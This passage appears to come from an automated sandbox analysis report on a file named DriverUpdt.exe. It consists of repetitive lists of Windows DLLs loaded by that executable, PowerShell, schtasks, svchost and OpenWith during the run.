                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
